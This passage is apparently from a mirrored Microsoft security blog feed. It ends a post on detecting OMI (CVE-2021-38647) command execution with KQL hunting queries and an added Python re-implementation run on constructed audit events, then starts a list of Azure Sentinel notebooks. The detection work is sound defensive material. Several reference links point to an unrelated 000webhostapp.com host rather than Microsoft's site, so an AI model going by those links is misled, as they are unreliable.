class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">path_nametype</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">path_mode</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">=" * "<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">proctitle</SPAN><SPAN 
class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">cmdline</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>" redactors=" *</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW164422095 BCX8"><SPAN class="SCXW164422095 BCX8">&nbsp;</SPAN><BR class="SCXW164422095 BCX8" /></SPAN><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">| where<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">syscall</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>in (</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">syscallsList</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">)</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW164422095 BCX8"><SPAN class="SCXW164422095 BCX8">&nbsp;</SPAN><BR class="SCXW164422095 BCX8" /></SPAN><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">| extend<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">fileAction</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>= (</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">parse_json</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">(</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">path_nametype</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">))[1]</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW164422095 BCX8"><SPAN class="SCXW164422095 BCX8">&nbsp;</SPAN><BR class="SCXW164422095 BCX8" /></SPAN><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">| where<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">fileAction</SPAN><SPAN class="NormalTextRun SCXW164422095 
BCX8"><SPAN>&nbsp;</SPAN>in ("CREATE","DELETE")</SPAN></SPAN><SPAN class="EOP SCXW164422095 BCX8" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></SPAN></PRE> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="executescript_kql_query_file_creation_deletion.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311951iC7B4DD01AF96E6A3/image-size/large?v=v2&amp;px=999" role="button" title="executescript_kql_query_file_creation_deletion.png" alt="executescript_kql_query_file_creation_deletion.png" /></span></P> <P>&nbsp;</P> <P>It seems that the <STRONG>omiagent</STRONG> creates and deletes the file. The file is available only during the execution of the script; once the execution is done, the file gets deleted. After doing some more research and reading some of the <A href="#" target="_blank" rel="noreferrer noopener">SCXCore code in GitHub</A>, this is the behavior of the ExecuteScript method:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="executescript_behavior.png" style="width: 572px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311952i8FAAABB5CC39FEEA/image-size/large?v=v2&amp;px=999" role="button" title="executescript_behavior.png" alt="executescript_behavior.png" /></span></P> 
<P>&nbsp;</P> <H3><FONT size="5">How can we cover both methods (ExecuteShellCommand and ExecuteScript) and show what the script executed?</FONT></H3> <P>As mentioned before, both methods execute from the <STRONG>/var/opt/microsoft/scx/tmp</STRONG> directory. Therefore, all we have to do is create a JOIN query that shows the process parent-child relationship, which gets us to the commands executed via the script method:</P> <P>&nbsp;</P> <DIV> <PRE>let scx_execve=(){
Syslog
| parse SyslogMessage with "type=" EventType " audit(" * "): " EventData
| where EventType =~ "AUOMS_EXECVE" and EventData has '/var/opt/microsoft/scx/tmp'
| project TimeGenerated, EventType, Computer, EventData
| parse EventData with * "syscall=" syscall " syscall_r=" * " success=" success " exit=" exit " a0" * " ppid=" ppid " pid=" pid " audit_user=" audit_user " auid=" auid " user=" user " uid=" uid " group=" group " gid=" gid " effective_user=" effective_user " euid=" euid " set_user=" set_user " suid=" suid " filesystem_user=" filesystem_user " fsuid=" fsuid " effective_group=" effective_group " egid=" egid " set_group=" set_group " sgid=" sgid " filesystem_group=" filesystem_group " fsgid=" fsgid " tty=" tty " ses=" ses " comm=\"" comm "\" exe=\"" exe "\"" * "cwd=\"" cwd "\"" * "name=\"" name "\"" * "cmdline=" cmdline " redactors=" *
| where uid == '0'
| where cwd == '/var/opt/microsoft/scx/tmp'
| where success == 'yes'
};
scx_execve
| where comm == 'sh' // ExecuteScript cmdline would trigger on /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/scx_
| join kind=leftouter ( scx_execve ) on $left.Computer == $right.Computer, $left.pid == $right.ppid
| project-rename parentEventData=EventData, parentppid=ppid, parentpid=pid, parentcomm=comm, parentexe=exe, parentname=name, parentcmdline=cmdline, childEventData=EventData1, childppid=ppid1, childpid=pid1, childcomm=comm1, childexe=exe1, childname=name1, childcmdline=cmdline1
| project TimeGenerated, Computer, user, parentEventData, parentppid, parentpid, parentcomm, parentexe, parentname, parentcmdline, childEventData, childppid, childpid, childcomm, childexe, childname, childcmdline
| extend Timestamp = TimeGenerated, HostCustomEntity = Computer, AccountCustomEntity = user</PRE> </DIV> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Final_Query.PNG" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312507i6564DFF9C8850EA7/image-size/large?v=v2&amp;px=999" role="button" title="Final_Query.PNG" alt="Final_Query.PNG" /></span></P> <P>&nbsp;</P> <P>This is now the hunting query we share via our Azure Sentinel GitHub repo!</P> 
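<P>To exercise the same parse-and-join logic offline, the following is an added Python re-implementation (example code, not the page's query or anything from the Azure-Sentinel repo) of the scx_execve() function and the parent/child self-join, run over constructed AUOMS_EXECVE Syslog rows. The hostnames, pids, timestamps, the /bin/sh -c form of ExecuteShellCommand and the fields filled into the parse pattern's "*" gaps are assumptions.</P>

```python
import re
from typing import Dict, List, Optional, Tuple

SCX_TMP = "/var/opt/microsoft/scx/tmp"  # cwd of both ExecuteShellCommand and ExecuteScript

# Mirrors: parse SyslogMessage with "type=" EventType " audit(" * "): " EventData
HEADER_RE = re.compile(r"^type=(?P<EventType>\S+) audit\([^)]*\): (?P<EventData>.*)$")
# key=value pairs inside EventData; a value is either "quoted" or a bare token
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S*)')

Row = Tuple[str, str, str]  # (Computer, TimeGenerated, SyslogMessage)
Event = Dict[str, Optional[str]]


def parse_syslog(computer: str, time_generated: str, syslog_message: str) -> Optional[Event]:
    """Parse one Syslog row the way the page's two 'parse' statements do."""
    m = HEADER_RE.match(syslog_message)
    if not m:
        return None
    event_data = m.group("EventData")
    # cmdline is unquoted and may contain spaces or '=', so split it off first;
    # it runs up to " redactors=", exactly as in the KQL pattern.
    head, sep, tail = event_data.partition(" cmdline=")
    fields: Event = {k: v.strip('"') for k, v in KV_RE.findall(head)}
    if sep:
        fields["cmdline"] = tail.split(" redactors=", 1)[0]
    fields.update(Computer=computer, TimeGenerated=time_generated,
                  EventType=m.group("EventType"), EventData=event_data)
    return fields


def scx_execve(rows: List[Row]) -> List[Event]:
    """Port of the page's scx_execve(): successful root execve events with cwd == SCX_TMP."""
    out: List[Event] = []
    for computer, ts, msg in rows:
        ev = parse_syslog(computer, ts, msg)
        if ev is None or ev["EventType"].lower() != "auoms_execve":
            continue
        if SCX_TMP not in ev["EventData"]:  # substring stand-in for KQL 'has'
            continue
        if ev.get("uid") == "0" and ev.get("cwd") == SCX_TMP and ev.get("success") == "yes":
            out.append(ev)
    return out


def hunt_scx_script_execution(rows: List[Row]) -> List[Event]:
    """The page's final query: /bin/sh launches (comm == 'sh') are the parents; every
    execve on the same host whose ppid equals the parent's pid is left-outer joined."""
    events = scx_execve(rows)
    results: List[Event] = []
    for parent in (e for e in events if e.get("comm") == "sh"):
        children = [c for c in events
                    if c["Computer"] == parent["Computer"] and c.get("ppid") == parent.get("pid")]
        for child in children or [None]:  # leftouter: a childless parent still yields a row
            results.append({
                "TimeGenerated": parent["TimeGenerated"], "Computer": parent["Computer"],
                "user": parent.get("user"), "parentpid": parent.get("pid"),
                "parentcmdline": parent.get("cmdline"),
                "childpid": child.get("pid") if child else None,
                "childcomm": child.get("comm") if child else None,
                "childcmdline": child.get("cmdline") if child else None,
            })
    return results


def make_event(ppid: int, pid: int, comm: str, exe: str, cwd: str, cmdline: str,
               success: str = "yes") -> str:
    """Constructed AUOMS_EXECVE message; the field order follows the page's parse pattern,
    the fields inside its '*' gaps (key, items, nametype, containerid) are assumptions."""
    return (f"type=AUOMS_EXECVE audit(1632412800.101:{pid}): syscall=execve syscall_r=59 "
            f"success={success} exit=0 a0=\"{exe}\" ppid={ppid} pid={pid} audit_user=unset "
            f"auid=4294967295 user=root uid=0 group=root gid=0 effective_user=root euid=0 "
            f"set_user=root suid=0 filesystem_user=root fsuid=0 effective_group=root egid=0 "
            f"set_group=root sgid=0 filesystem_group=root fsgid=0 tty=(none) ses=unset "
            f"comm=\"{comm}\" exe=\"{exe}\" key=(null) cwd=\"{cwd}\" items=1 name=\"{exe}\" "
            f"nametype=NORMAL cmdline={cmdline} redactors= containerid=")


LAB, LAB2, T = "linux-lab-01", "linux-lab-02", "2021-09-23T16:00:00Z"  # constructed
SAMPLE_ROWS: List[Row] = [
    # ExecuteScript: omiagent runs /bin/sh on the temp script; the script's commands are children
    (LAB, T, make_event(2001, 2010, "sh", "/bin/dash", SCX_TMP,
                        "/bin/sh /etc/opt/microsoft/scx/conf/tmpdir/scx_CONSTRUCTED")),
    (LAB, T, make_event(2010, 2011, "id", "/usr/bin/id", SCX_TMP, "id")),
    (LAB, T, make_event(2010, 2012, "uname", "/bin/uname", SCX_TMP, "uname -a")),
    # ExecuteShellCommand: /bin/sh -c <command>, same parent/child shape
    (LAB, T, make_event(2001, 2020, "sh", "/bin/dash", SCX_TMP, "/bin/sh -c whoami")),
    (LAB, T, make_event(2020, 2021, "whoami", "/usr/bin/whoami", SCX_TMP, "whoami")),
    # noise: names the temp dir but cwd differs -> dropped by scx_execve
    (LAB, T, make_event(1500, 1501, "ls", "/bin/ls", "/root", f"ls {SCX_TMP}")),
    # noise: failed execve -> dropped
    (LAB, T, make_event(2001, 2030, "sh", "/bin/dash", SCX_TMP, "/bin/sh -c hostname", "no")),
    # another host reusing pid 2010 as ppid: must not be joined to linux-lab-01's shell
    (LAB2, T, make_event(2010, 2013, "cat", "/bin/cat", SCX_TMP, "cat notes.txt")),
    # a shell whose child execve was never collected: kept by the left-outer join
    (LAB2, T, make_event(3001, 3010, "sh", "/bin/dash", SCX_TMP, "/bin/sh -c hostname")),
]

if __name__ == "__main__":
    for r in hunt_scx_script_execution(SAMPLE_ROWS):
        print(r["Computer"], r["user"], repr(r["parentcmdline"]), "->", repr(r["childcmdline"]))
```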
<P>&nbsp;</P> <P><A href="#" target="_blank">Azure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com)</A></P> <P>&nbsp;</P> <P>That’s it! I am sure there is more to explore! I hope this lab environment can help you to test a few things in a safer way and experience what it might look like if it happens in your environment.</P> <P>&nbsp;</P> <P><STRONG>Once again, we highly recommend upgrading the OMI agent to version 1.6.8-1+, and if possible, controlling access to ports 5986, 5985 and 1270.</STRONG> <STRONG>Remember that this vulnerability is actively being exploited. Therefore, make sure you do not expose your lab environment to the Internet.</STRONG></P> <P>&nbsp;</P> <P>In addition, remember that the behavior documented in this post is not malicious. The lab was created to help us understand how the execution of commands or a script was being handled by OMI from a data perspective. You must then go through the results of those queries and validate what is legitimate behavior or not depending on your organization’s baseline.</P> <P>&nbsp;</P> <P>Also, use this knowledge to map data you collect to every single action documented ;) You might be collecting data from other sources that provide the same or similar visibility.</P> <P>&nbsp;</P> <H2><FONT size="6">Resources</FONT></H2> <UL> <LI>Linux Lab Environment - OMI Vulnerability: <A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · OTRF/Azure-Sentinel2Go (github.com)</A></LI> <LI>Install OMS Agent bash script: <A href="#" target="_blank" rel="noopener">Blacksmith/Install-OMS-Linux-Agent.sh at master · OTRF/Blacksmith (github.com)</A></LI> <LI>Install OMS Auditd Plugin bash script: <A href="#" target="_blank" rel="noopener">Blacksmith/Install-OMS-Auditd-Plugin.sh at master · OTRF/Blacksmith (github.com)</A></LI> <LI>Install OMI bash script: <A href="#" target="_blank" rel="noopener">Blacksmith/Install-OMI.sh at master · OTRF/Blacksmith (github.com)</A></LI> <LI>Hunting query: <A href="#" target="_blank">Azure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com)</A></LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6">References</FONT></H2> <UL> <LI><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093" target="_blank" rel="noopener">Hunting for OMI Vulnerability Exploitation with Azure Sentinel - Microsoft Tech Community</A></LI> <LI><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/hunting-threats-on-linux-with-azure-sentinel/ba-p/1344431" target="_blank" rel="noopener">Hunting Threats on Linux with Azure Sentinel - Microsoft Tech Community</A></LI> <LI><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/guided-hunting-notebook-base64-encoded-linux-commands/ba-p/1579484" target="_blank" rel="noopener">Guided Hunting Notebook: Base64-Encoded Linux Commands - Microsoft Tech Community</A></LI> <LI><A href="#" target="_blank" rel="noopener">Collect Syslog data sources with Log Analytics agent in Azure Monitor - Azure Monitor | Microsoft Docs</A></LI> <LI><A href="#" target="_blank" rel="noopener">microsoft/SCXcore: System Center Cross Platform Provider for Operations Manager (github.com)</A></LI> <LI><A href="#" target="_blank" rel="noopener">OMS-Agent-for-Linux/tools/OMIcheck at master · microsoft/OMS-Agent-for-Linux (github.com)</A></LI> <LI><A href="#" target="_blank" rel="noopener">7.6. Understanding Audit Log Files Red Hat Enterprise Linux 7 | Red Hat Customer Portal</A></LI> <LI><A href="#" target="_blank" rel="noopener">Release v1.6.8-0 · microsoft/omi (github.com)</A></LI> <LI><A href="#" target="_blank" rel="noopener">microsoft/OMS-Auditd-Plugin: Auditd plugin that forwards audit events to OMS Agent for Linux (github.com)</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel/SCXRunAsProviderExecuteShellCommand.yml at master · Azure/Azure-Sentinel (github.com)</A></LI> </UL> <P>&nbsp;</P> Fri, 24 Sep 2021 16:26:22 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-to-go-a-linux-lab-with-auoms-set-up-to-learn/ba-p/2772581 Cyb3rWard0g 2021-09-24T16:26:22Z Azure Sentinel Notebooks Ninja Part 3: Overview of the Pre-built Notebooks - the Grand List https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-notebooks-ninja-part-3-overview-of-the-pre-built/ba-p/2768838 <P><EM>This installment is part of a broader learning series to help you become a Jupyter Notebook ninja in Azure Sentinel. The installments will be bite-sized to enable you to easily digest the new content.</EM></P> <P>&nbsp;</P> <UL> <LI><STRONG>Part 1:</STRONG>&nbsp;<A href="#" 
target="_blank" rel="noopener">What are notebooks and when do you need them</A>?</LI> <LI><STRONG>Part 2:</STRONG> <A href="#" target="_blank" rel="noopener">How to get started with notebooks and tour the features</A></LI> <LI><STRONG>Part 3:</STRONG> Overview of the pre-built notebooks: the Grand List – <STRONG><EM>this post</EM></STRONG></LI> <LI><STRONG>Part 4:</STRONG> How to create your own notebooks from scratch and how to customize the existing ones</LI> </UL> <P>Through <A href="#" target="_blank" rel="noopener">Part 1</A> and <A href="#" target="_blank" rel="noopener">Part 2</A> of this Azure Sentinel Notebook Ninja series, we’ve discussed the concepts and activities to best become acclimated with Jupyter notebooks for Azure Sentinel. The next step in our process is understanding the value of having ready-made notebooks available as part of the solution.</P> <P>&nbsp;</P> <P>When a customer stands up Azure Sentinel for the first time, there are a number of additional pieces of ready-to-use collateral that are provided <EM>out-of-the-box</EM>, including Analytics Rules, Hunting queries, Connectors, Solutions, Workbooks – and – you guessed it – <STRONG>Notebooks</STRONG>.</P> <P>&nbsp;</P> <P>The notebooks are mostly one of three types:</P> <P>&nbsp;</P> <UL> <LI><STRONG>Exploration</STRONG> notebooks. These are meant to be used as they are or with your own customizations to explore specific hunting and investigation scenarios. Examples of this type include the Entity explorer series. (“Entity” refers to items such as hosts, IP addresses, accounts, URLs, etc.)</LI> <LI><STRONG>Simple How-To</STRONG> notebooks like the Get Started notebook.</LI> <LI><STRONG>Sample</STRONG> notebooks. 
These are longer and are meant to be instructional examples following a real or simulated hunt or investigation.</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="rodtrent_0-1632174794690.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311667iE0C577E9BA86A6C8/image-size/large?v=v2&amp;px=999" role="button" title="rodtrent_0-1632174794690.png" alt="rodtrent_0-1632174794690.png" /></span></P> <P>&nbsp;</P> <P>The following Grand List represents the notebooks that are provided when setting up Azure Sentinel.</P> <P>&nbsp;</P> <H2><FONT size="5">Azure Sentinel Notebooks – The Grand List</FONT></H2> <P>&nbsp;</P> <CENTER> <TABLE class=" lia-align-left" style="border-style: solid;" width="auto"> <TBODY> <TR> <TD width="157.906px" height="30px" style="vertical-align: top; width: 200px;"> <P><STRONG>Notebook Name</STRONG></P> </TD> <TD width="216.328px" height="30px" style="vertical-align: top; width: 100px;"> <P><STRONG>Type</STRONG></P> </TD> <TD width="432.672px" height="30px" style="vertical-align: top; width: 450px;"> <P><STRONG>Description</STRONG></P> </TD> <TD width="316.094px" height="30px" style="vertical-align: top; width: 200px;"> <P><STRONG>Special Requirements</STRONG></P> </TD> </TR> <TR> <TD width="157.906px" height="165px" style="vertical-align: top; width: 200px;"> <P><A href="#" target="_blank" rel="noopener"><STRONG>A Getting Started Guide For Azure Sentinel ML Notebooks</STRONG></A></P> </TD> <TD width="216.328px" height="165px" style="vertical-align: top; width: 100px;"> <P>Getting Started</P> </TD> <TD width="432.672px" height="165px" style="vertical-align: top; width: 450px;"> <P>This notebook guides you through the basic steps of using notebooks for security analysis. It covers all the basic steps you need to understand to start using the notebooks provided with Azure Sentinel.</P> </TD> <TD width="316.094px" height="165px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SigninLogs</P> <P>&nbsp;</P> <P><STRONG>External service(s):</STRONG> VirusTotal, MaxMind, MSTICPy</P> <P>&nbsp;</P> <P><STRONG>Package(s):</STRONG> MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>A Getting Started Guide For PowerShell AML Notebooks</STRONG></P> </TD> <TD width="216.328px" height="111px" style="vertical-align: top; width: 100px;"> <P>Getting Started, PowerShell</P> </TD> <TD width="432.672px" height="111px" style="vertical-align: top; width: 450px;"> <P>This notebook takes you through the basics needed to get started with PowerShell notebooks that leverage Azure Sentinel data and APIs.</P> </TD> <TD width="316.094px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent</P> </TD> </TR> <TR> <TD width="157.906px" height="219px" style="vertical-align: top; width: 200px;"> <P><STRONG>A Tour of Cybersec notebook features</STRONG></P> </TD> <TD width="216.328px" height="219px" style="vertical-align: top; width: 100px;"> <P>Getting Started</P> </TD> <TD width="432.672px" height="219px" style="vertical-align: top; width: 450px;"> <P>This notebook takes you through some of the features of Azure Sentinel notebooks and MSTICPy. It's a good second notebook to explore after "A Getting Started Guide for Azure ML notebooks". It covers data queries, visualization, data analysis, enrichment with threat intelligence and pivot functions. It can be run against your Azure Sentinel workspace or standalone, with sample data.</P> </TD> <TD width="316.094px" height="219px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent, SecurityAlert</P> <P>&nbsp;</P> <P><EM>If no data types are available, sample data will be used.</EM></P> <P>&nbsp;</P> <P><STRONG>Package(s):</STRONG> MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="165px" style="vertical-align: top; width: 200px;"> <P><STRONG>Configuring your Notebook Environment</STRONG></P> </TD> <TD width="216.328px" height="165px" style="vertical-align: top; width: 100px;"> <P>Configuration</P> </TD> <TD width="432.672px" height="165px" style="vertical-align: top; width: 450px;"> <P>This notebook takes you through detailed setup of your settings for Azure Sentinel Notebooks and the MSTICPy library. It covers: setting up your Python environment for notebooks (not required for AML notebooks), creating and editing your msticpyconfig.yaml file, and understanding and managing your config.json file.</P> </TD> <TD width="316.094px" height="165px" style="vertical-align: top; width: 200px;"> <P><STRONG>Package(s):</STRONG> MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="84px" style="vertical-align: top; width: 200px;"> <P><A href="#" target="_blank" rel="noopener"><STRONG>Credential Scan on Azure Blob Storage</STRONG></A></P> </TD> <TD width="216.328px" height="84px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="84px" style="vertical-align: top; width: 450px;"> <P>This notebook provides step-by-step instructions and sample code to detect credential leaks into Azure Blob Storage using the Azure SDK for Python.</P> </TD> <TD width="316.094px" height="84px" style="vertical-align: top; width: 200px;"> <P><STRONG>Package(s):</STRONG> MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="84px" style="vertical-align: top; width: 200px;"> <P><A href="#" target="_blank" 
rel="noopener"><STRONG>Credential Scan on Azure Data Explorer</STRONG></A></P> </TD> <TD width="216.328px" height="84px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="84px" style="vertical-align: top; width: 450px;"> <P>This notebook provides step-by-step instructions and sample code to detect credential leak into Azure Data Explorer using Azure SDK for Python and KQL.</P> </TD> <TD width="316.094px" height="84px" style="vertical-align: top; width: 200px;"> <P><STRONG>Package(s): </STRONG>MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="84px" style="vertical-align: top; width: 200px;"> <P><A href="#" target="_blank" rel="noopener"><STRONG>Credential Scan on Azure Log Analytics</STRONG></A></P> </TD> <TD width="216.328px" height="84px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="84px" style="vertical-align: top; width: 450px;"> <P>This notebook provides step-by-step instructions and sample code to detect credential leak into Azure Log Analytics using Azure SDK for Python and KQL.</P> </TD> <TD width="316.094px" height="84px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent</P> <P>&nbsp;</P> <P><STRONG>Package(s): </STRONG>MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="192px" style="vertical-align: top; width: 200px;"> <P><STRONG>Entity Explorer – Account</STRONG></P> </TD> <TD width="216.328px" height="192px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="192px" style="vertical-align: top; width: 450px;"> <P>Use queries and visualizations to help you assess the security state of an AAD/O365 account or an account on a local host. It includes examining Azure Active Directory (AAD) and Office365 activity for an account and identifying any related anomalous behavior. 
It also allows you to correlate the IP addresses in related events with threat intelligence sources.</P> </TD> <TD width="316.094px" height="192px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent, SecurityAlert, AzureNetworkAnalytics_CL, Heartbeat, AAD, OfficeActivity</P> <P>&nbsp;</P> <P><STRONG>Package(s):</STRONG> kqlmagic, msticpy, pandas, numpy, matplotlib, networkx, ipywidgets, ipython, dnspython, ipwhois, folium, maxminddb_geolite2</P> </TD> </TR> <TR> <TD width="157.906px" height="192px" style="vertical-align: top; width: 200px;"> <P><STRONG>Entity Explorer - Domain and URL</STRONG></P> </TD> <TD width="216.328px" height="192px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="192px" style="vertical-align: top; width: 450px;"> <P>Use queries and visualizations to help you assess the security state of a DNS host or domain name. Examine DNS requests to look for malicious DNS usage, such as DNS tunneling, as well as anomalous DNS name lookups. 
Query threat intelligence and domain ownership using WhoIS information for a specific DNS name, to get a better understanding of the domain name’s reputation.</P> </TD> <TD width="316.094px" height="192px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent, SecurityAlert, AzureNetworkAnalytics_CL, Heartbeat, DNS, Syslog</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp;</STRONG> <SPAN>kqlmagic, msticpy, pandas, numpy, matplotlib, networkx, ipywidgets, ipython, dnspython, ipwhois, folium, maxminddb_geolite2</SPAN></P> </TD> </TR> <TR> <TD width="157.906px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Entity Explorer - IP Address</STRONG></P> </TD> <TD width="216.328px" height="111px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="111px" style="vertical-align: top; width: 450px;"> <P>Brings together a series of queries and visualizations to help you assess the security state of an IP address. It works with both internal addresses and public addresses.</P> </TD> <TD width="316.094px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent, SecurityAlert, AzureNetworkAnalytics_CL, Heartbeat</P> <P>&nbsp;</P> <P><STRONG>External service(s):</STRONG>&nbsp;VirusTotal, Alienvault OTX, IBM Xforce</P> </TD> </TR> <TR> <TD width="157.906px" height="165px" style="vertical-align: top; width: 200px;"> <P><STRONG>Entity Explorer - Linux Host</STRONG></P> </TD> <TD width="216.328px" height="165px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="165px" style="vertical-align: top; width: 450px;"> <P>This notebook brings together a series of tools and techniques to enable threat hunting within the context of a singular Linux host. 
The notebook utilizes a range of data sources to achieve this, but in order to support the widest possible range of scenarios it prioritizes common Syslog data.</P> </TD> <TD width="316.094px" height="165px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> Syslog, Auditd_CL, SecurityAlert, AzureNetworkAnalytics_CL, Heartbeat</P> <P>&nbsp;</P> <P><STRONG>Package(s):</STRONG> kqlmagic, msticpy, pandas, pandas_bokeh, numpy, matplotlib, networkx, seaborn, datetime, ipywidgets, ipython, dnspython, ipwhois, folium, maxminddb_geolite2</P> </TD> </TR> <TR> <TD width="157.906px" height="192px" style="vertical-align: top; width: 200px;"> <P><STRONG>Entity Explorer - Windows Host</STRONG></P> </TD> <TD width="216.328px" height="192px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="192px" style="vertical-align: top; width: 450px;"> <P>Brings together a series of queries and visualizations to help you determine the security state of the Windows host or virtual machine that you are investigating. 
It looks for related alerts, allows you to examine logon sessions and processes, check process command lines for IoCs and explores network traffic between the host and external endpoints.</P> </TD> <TD width="316.094px" height="192px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent, SecurityAlert, AzureNetworkAnalytics_CL, Heartbeat</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp;</STRONG>kqlmagic, msticpy, pandas, numpy, matplotlib, bokeh, networkx, ipywidgets, ipython, scikit_learn, dnspython, ipwhois, folium, maxminddb_geolite2</P> </TD> </TR> <TR> <TD width="157.906px" height="138px" style="vertical-align: top; width: 200px;"> <P><STRONG>Guided Hunting - Anomalous Office365 Exchange Sessions</STRONG></P> </TD> <TD width="216.328px" height="138px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="138px" style="vertical-align: top; width: 450px;"> <P>Brings together a series of data science techniques to help you hunt for anomalous sessions in your Office Exchange logs. It queries the OfficeActivity table, creates sessions from the PowerShell cmdlets (e.g. Set-Mailbox), trains a model and then visualizes the sessions.</P> </TD> <TD width="316.094px" height="138px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> OfficeActivity</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp;</STRONG> <SPAN>msticpy, pandas, kqlmagic</SPAN></P> </TD> </TR> <TR> <TD width="157.906px" height="192px" style="vertical-align: top; width: 200px;"> <P><A href="#" target="_blank" rel="noopener"><STRONG>Guided Hunting - Base64-Encoded Linux Commands</STRONG>&nbsp;</A></P> </TD> <TD width="216.328px" height="192px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="192px" style="vertical-align: top; width: 450px;"> <P>This notebook is a collection of tools for detecting malicious behavior when commands are 